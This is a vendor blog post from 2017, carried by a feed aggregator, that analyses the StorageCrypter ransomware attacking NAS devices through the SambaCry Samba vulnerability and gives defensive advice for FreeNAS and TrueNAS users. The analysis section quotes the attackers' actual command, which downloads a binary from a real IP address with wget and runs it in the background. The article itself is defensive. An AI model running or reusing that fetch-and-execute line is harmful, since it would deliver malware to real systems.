惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

S
Securelist
腾讯CDC
L
LangChain Blog
aimingoo的专栏
aimingoo的专栏
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
博客园_首页
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
云风的 BLOG
云风的 BLOG
P
Proofpoint News Feed
罗磊的独立博客
爱范儿
爱范儿
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
H
Help Net Security
Vercel News
Vercel News
MyScale Blog
MyScale Blog
博客园 - 叶小钗
The Register - Security
The Register - Security
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
量子位
Y
Y Combinator Blog
C
Cyber Attacks, Cyber Crime and Cyber Security
NISL@THU
NISL@THU
GbyAI
GbyAI
SecWiki News
SecWiki News
M
MIT News - Artificial intelligence
Engineering at Meta
Engineering at Meta
P
Privacy International News Feed
月光博客
月光博客
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
C
Check Point Blog
博客园 - 聂微东
Project Zero
Project Zero
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Latest news
Latest news
V
Vulnerabilities – Threatpost
T
The Blog of Author Tim Ferriss
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
D
Darknet – Hacking Tools, Hacker News & Cyber Security
T
Tor Project blog
F
Fortinet All Blogs
Recorded Future
Recorded Future
IT之家
IT之家
D
Docker
The GitHub Blog
The GitHub Blog
V
Visual Studio Blog
MongoDB | Blog
MongoDB | Blog
T
Threat Research - Cisco Blogs
Hugging Face - Blog
Hugging Face - Blog
C
CXSECURITY Database RSS Feed - CXSecurity.com
V
V2EX

TrueNAS – Open Enterprise Storage

What We Heard at NAB 2026 | TrueNAS - Open Enterprise Storage TrueNAS V160 Launched: High Performance, No All-Flash Tax TrueNAS 26 Is Here: What's New in This Major Release TrueNAS Connect: Enterprise Features on Your Own Hardware TrueNAS Immutability: Multi-Layered Data Protection & Ransomware Defense TrueNAS CEO Note to Community: We Are All TrueNAS TrueNAS 25.10.2 Goldeye: 100+ Fixes & What's New TrueNAS Names Brett Davis CEO for Enterprise Growth TrueNAS Plans for 2026: TrueNAS 26 & OpenZFS 2.4 Roadmap TrueNAS Connect Plus Now Available for All Community Users TrueNAS R60: High-Speed NVMe Storage for AI Workloads Introducing TrueNAS WebShare: Secure Web-Based File Sharing TrueNAS 25.10.1: Goldeye Matures, Performs, and Connects TrueNAS & Veeam v13: Turnkey Cyber‑Resilient Backups Customer Advantages of the TrueNAS Open Core Model TrueNAS Named Data Storage Company of the Year 2025 TrueNAS 25.10: Smarter, Streamlined Updates & Tools TrueNAS F-Series Shines at IBC with Two “Best of Show” Awards TrueNAS 25.10 “Goldeye”: NVMe‑oF, Unified, Simplified Storage Introducing TrueNAS Connect: Secure Monitoring & Alerts The ESG Advantage of Open Enterprise Architecture: Why TrueNAS Is the Sustainable Choice | TrueNAS - Open TrueNAS 25.10-RC1: New Features, Fixes & OpenZFS 2.3.4 Seamless Setup: Exploring TrueNAS Web-Driven Installation | TrueNAS - Open Enterprise Storage TrueNAS 25.10 “Goldeye” BETA is Available TrueNAS 25.10 “Goldeye” Highlights TrueNAS 25.04.2: Fangtooth restores Virtualization iXsystems Rebrands as TrueNAS to Reflect Market Momentum in Enterprise Storage | TrueNAS - Open Enterprise June 1 - Apps Migration Deadline for TrueNAS 24.04 and 23.10 TrueNAS 25.04.1: Fangtooth Unification Gains Momentum TrueNAS 24.10.2.2 Prepares for IP Addressing of Apps TrueNAS H30 and F100 add Fast Dedup with TrueNAS 25.04 Meet TrueNAS Community Edition – The Future of Open Storage TrueNAS Apps Made Easy with Electric Eel & Fangtooth TrueNAS H30 Secures Two ‘Best of Show’ Honors at NAB 2025 | TrueNAS - Open Enterprise Storage TrueNAS H30 Wins Best of Show Awards at NAB 2025 TrueNAS 25.04: Fangtooth is RELEASED Slash Your Virtualization Costs with TrueNAS Storage TrueCommand 3.1 Enhances Management and Monitoring TrueNAS 25.04: Fangtooth Unification Begins with New Features Fangtooth Unification Begins | TrueNAS iXsystems Experiences Record Growth in TrueNAS Enterprise Storage, Spins Off Server Business to Amaara How to Set Up and Install TrueNAS CORE Yes, You Can (Still) Virtualize TrueNAS TrueNAS enables Container Storage and Kubernetes | TrueNAS - Open Enterprise Storage TrueNAS 12.0-U2 is Released | TrueNAS - Open Enterprise Storage OpenZFS 2.0 Ships First on TrueNAS | TrueNAS - Open Enterprise Storage TrueNAS 12.0-U1 is Scheduled for early December | TrueNAS - Open Enterprise Storage iXsystems TrueNAS M60 Recognized as SDC Awards Storage Hardware Innovation of the Year Finalist | TrueNAS - TrueNAS 12.0 is Released! The TrueNAS Mini X and Mini X+ are here! Cross-Site Disaster Recovery with TrueNAS TrueNAS SCALE Release Plan | TrueNAS - Open Enterprise Storage iXsystems Unveils Industry's Fastest OpenZFS Storage System with Launch of TrueNAS M60 | TrueNAS - Open TrueNAS 12.0 BETA2 Showcases Performance Improvements | TrueNAS - Open Enterprise Storage Be One of the First to Test Drive TrueNAS 12.0 BETA | TrueNAS - Open Enterprise Storage TrueNAS is Multi-OS New-New TrueNAS Logo Unveiled | TrueNAS - Open Enterprise Storage Recession Proof Storage | FreeNAS 11.3-U3.1 Now Available - Issue #80 | TrueNAS - Open Enterprise Storage Open Source Infrastructure is Recession-Proof | TrueNAS - Open Enterprise Storage Understanding How OpenZFS Keeps Your Data Safe | TrueNAS - Open Enterprise Storage You Can Influence the TrueNAS CORE Roadmap! | TrueNAS - Open Enterprise Storage TrueNAS CORE is the new FreeNAS Setting Up Users, Permissions, and ACLs on FreeNAS | TrueNAS - Open Enterprise Storage TrueNAS Updates for VMware vSphere 7 | TrueNAS - Open Enterprise Storage How to Set Up Windows SMB Shares on FreeNAS | TrueNAS - Open Enterprise Storage FreeNAS and TrueNAS are Unifying Introducing the FreeNAS Mini E+ and All-Flash Minis | TrueNAS - Open Enterprise Storage Plex Permissions in FreeNAS 11.3 | TrueNAS - Open Enterprise Storage Latest TrueNAS and FreeNAS Release Delivers Wizards, Plugins, and Accelerated Replication | TrueNAS - Open How To Back Up Google Drive to FreeNAS | TrueNAS How To Enable Wireguard on FreeNAS 11.3 | TrueNAS - Open Enterprise Storage The Official FreeNAS Hardware Guide | TrueNAS - Open Enterprise Storage December 11 Plugins Update: ClamAV Fix & CloudStack FreeNAS Mini Black Friday Sale Starts Now! - Issue #73 | TrueNAS - Open Enterprise Storage Breaking Down the FreeNAS Mini E! | TrueNAS TrueCommand Shifts to Prime Time | TrueNAS - Open Enterprise Storage AMD EPYC 7002 Powers Scalable TrueNAS Solutions FreeNAS and TrueNAS 11.3 make their Debuts October 30 Plugins Update | TrueNAS - Open Enterprise Storage Overview of Datasets and Snapshots in FreeNAS | TrueNAS - Open Enterprise Storage September 13 Plugins Update | TrueNAS - Open Enterprise Storage Mount a TrueNAS or FreeNAS Share to a Docker Host | TrueNAS - Open Enterprise Storage Open ZFS vs. Btrfs | and other file systems | TrueNAS - Open Enterprise Storage ZFS vs. OpenZFS Backup Evolved: Asigra Plugin for FreeNAS Back Up Plugins and Jails on FreeNAS | TrueNAS Take Command of Your NAS Fleet with TrueCommand™ | TrueNAS - Open Enterprise Storage Run S3 Object Storage on FreeNAS and TrueNAS | TrueNAS - Open Enterprise Storage Sync Files to Dropbox with TrueNAS or FreeNAS February Plugin Updates & New Plugins for Testing Six Metrics for Measuring ZFS Pool Performance Part 2 | TrueNAS - Open Enterprise Storage Six Metrics for Measuring ZFS Pool Performance Part 1 | TrueNAS - Open Enterprise Storage TrueNAS M-Series Certified for Veeam Backup FreeNAS 11.1 is Now Available for Download! | TrueNAS FreeNAS 11.0 Released with VM & S3 Storage Support To SLOG or not to SLOG: How to best configure your ZFS Intent Log | TrueNAS - Open Enterprise Storage vCenter Web Client Plug-in for TrueNAS Now Available | TrueNAS - Open Enterprise Storage The ZFS ZIL and SLOG Demystified | TrueNAS - Open Enterprise Storage FreeNAS: A Worst Practices Guide | TrueNAS - Open Enterprise Storage FreeNAS vs TrueNAS
StorageCrypter Ransomware: Security Threat or Clickbait?
iX Team · 2017-12-27 · via TrueNAS – Open Enterprise Storage

NOTE: This is historical content that may contain outdated information.

The StorageCrypter Ransomware appears to be targeting NAS systems around the world but the facts surrounding it have been somewhat confusing. Let’s look at why your TrueNAS and FreeNAS systems are not vulnerable to this specific attack and how to further protect yourself from this category of attacks.

Hats off signage

Hats off to the most buzzword-loaded headline of the year: “StorageCrypt Ransomware Infecting NAS Devices Using SambaCry”. You shouldn’t have much trouble finding the article or the dozens of reproductions of it but you may have trouble determining exactly what the real-world risks of the “StorageCrypt” ransomware are and if they can impact you as a FreeNAS or TrueNAS user. The various articles suggest that “StorageCrypt” is:

  • Linux ransomware that executes on a storage system
  • Windows ransomware that executes on a connected client
  • Cryptocurrency mining software
  • An encryption product for Windows
  • Also known as StorageCrypter

First off, the “StorageCrypt” ransomware does not appear to have anything to do with the StorageCrypt encryption software found at storagecrypt.com. This naming collision appears to be the result of sloppy journalism and “StorageCrypt ransomware” now wins the search battle against the more-correct “StorageCrypter ransomware”. I will use “StorageCrypter” going forward out of respect for the StorageCrypt authors.
From there, I cannot help but notice that every website relating to “StorageCrypter” is more or less part of Windows-oriented advertising networks for antivirus/anti-ransomware tools, articles, and tutorials, many of which blur the line between the “download” links of articles and “Download NOW!” advertisements. I consider this approach irresponsible given how many of these links are clickbait for what may, in turn, be mildly-malicious adware and spyware. I do however appreciate the clear reminder of why I have never run Microsoft Windows.

What we know about StorageCrypter
The known StorageCrypter victims are finding their files renamed with the “.locked” extension and a ransom note entitled “_READ_ME_FOR_DECRYPT.txt” containing information on what has happened and how to get the files back. Some users also see a Windows executable named “美女与野兽.exe” which translates to “The Beauty and the Beast”, accompanied by an Autorun.inf to launch it. Two reported vulnerable NAS systems are the Thecus 7710G NAS and the Western Digital MyCloud EX4100, the first of which is Intel-based and the second ARM-based, both running GNU/Linux. Both Thecus and Western Digital have issued software updates to address the issue, as have Cisco, NETGEAR, QNAP and Synology, Veritas and NetApp as a precaution.

As for how these systems were attacked, at least one user confessed, “I exposed my WD MyCloud to the internet via port forwarding on my router”. Doing this is indeed a plausible vector for the “SambaCry” vulnerability to take advantage of the Samba SMB service version 3.5.0 through versions 4.6.4, 4.5.10 and 4.4.14. “SambaCry”, or more accurately CVE-2017-7494, allows a carefully-crafted Samba shared library to be injected over network port 445 provided that the attacker can guess the path to a writable share. If these required criteria are met and the shared library is executed by Samba, the attacker can execute shell commands on the target system with the permissions of the smbd process. In the case of StorageCrypter, those commands appear to be ‘wget -O /tmp/apaceha http://45.76.102.45/sambacry && chmod -x /tmp/apaceha &&nohub /tmp/apaceha >/dev/null 2>&1 &’ which downloads and executes a binary named “sambacry” that is renamed to “apaceha”. According to one source, this payload is a downloader of other payloads that could be as simple as the “美女与野兽.exe” landmine for Windows users to step on but this has not been confirmed. Running the program would execute the ransomware on the connected Windows system, encrypting all accessible files on the NAS system and possibly other locations such as local disks.

What does this mean for FreeNAS users?
FreeNAS systems later than 9.10.2-U4 are not vulnerable to SambaCry. In addition, unlike the commodity NAS systems described above, FreeNAS:

  • Does not run GNU/Linux, significantly reducing its attack surface
  • Does not have any default SMB sharing paths, slowing an attack
  • Could mitigate the ransomware aspect of the attack with OpenZFS snapshots
  • Should, as with any NAS, never be exposed to the Internet in the first place

Just as with any ransomware attack that directly targets network shares, OpenZFS snapshots in FreeNAS and TrueNAS are a proven means of quickly recovering from the damage done by the attack and avoiding payment of a ransom. Unfortunately, the StorageCrypter attack marks a shift from ransomware relying on users falling for attractive phishing bait to automated attacks that exploit software vulnerabilities. Attackers have not yet set their sights on OpenZFS snapshots when launching ransomware attacks but you should start protecting yourself in case they do:

  • Never expose your FreeNAS or TrueNAS storage system to the open Internet like the 350,000 Samba users who are at this very moment!
  • If you need to grant remote access to your system for administrative reasons such as remote replication, do so using a combination of a GeoIP-aware firewall and a Virtual Private Network
  • Set the “exec=off” OpenZFS property on your shares to prevent malware execution

The FreeNAS engineering team is watching this situation closely and is always looking for opportunities to further secure FreeNAS and TrueNAS. Watch the Why we Love ZFS & You Should Too and Defeating Ransomware with TrueNAS webinars to find out more about OpenZFS and how to use OpenZFS snapshots to protect yourself from attacks like StorageCrypter.
Michael Dexter
Senior Analyst